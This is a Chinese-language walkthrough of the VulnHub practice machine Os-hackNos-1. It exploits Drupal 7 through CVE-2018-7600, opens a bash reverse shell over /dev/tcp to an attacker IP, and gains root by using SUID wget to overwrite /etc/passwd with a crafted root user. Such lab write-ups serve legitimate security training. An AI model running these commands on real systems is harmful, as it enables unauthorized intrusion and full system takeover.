靶场名称：Os-hackNos-1
难度：简单
下载链接：https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

环境搭建

下一步使用虚拟机（vm）打开镜像

这里如果没有ip 的话参考
https://www.yuque.com/docs/share/76c0f057-3a94-40dd-b17d-7d9c02c59129?# 《Vulnhub靶机检测不到IP》

WEB渗透

*80和22端口开着，一个ssh远程连接一个web服务

打开80端口查看，发现是ubuntu的默认网页


扫描目录（这里用的dirsreach默认字典，也可以-w 路径 指定字典）


一开始再纠结james漏洞，发现存在任意命令执行，不过需要知道账户密码
后来查看了一下指纹信息

发现是drupal框架，寻找有无可利用漏洞，这里是drupal7 版本
这里从github上下载exp工具使用：https://github.com/pimps/CVE-2018-7600


这里尝试利用任意代码执行反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.50.164/20888 <&1'

提权

通过命令查看系统版本和内核信息

uname -a
lsb_release -a

这里可以远程建一个http服务，用Wget下载，但无执行权限，想办法赋予权限或者采用其他方法

SUID提权

这里查看一下suid权限

find / -perm -u=s -type f 2>/dev/null

这里发现wget拥有root权限，可以用wget下载替换文件
替换/etc/passwd

在kali上生成密码
openssl passwd ‐1 ‐salt 'sun' 123456

创建文件passwd 把 写入summer 为root权限
vim passwd
复制粘贴原来的passwd
加入summer
sun:$1$sun$Rf54ApPQD/7saC.SbX/OQ.:0:0:root:/root:/bin/bash

下载替换/etc/passwd
wget http://192.168.50.164:10888/passwd -O /etc/passwd

//python 实现交互shell
python3 -c 'import pty; pty.spawn("/bin/bash")'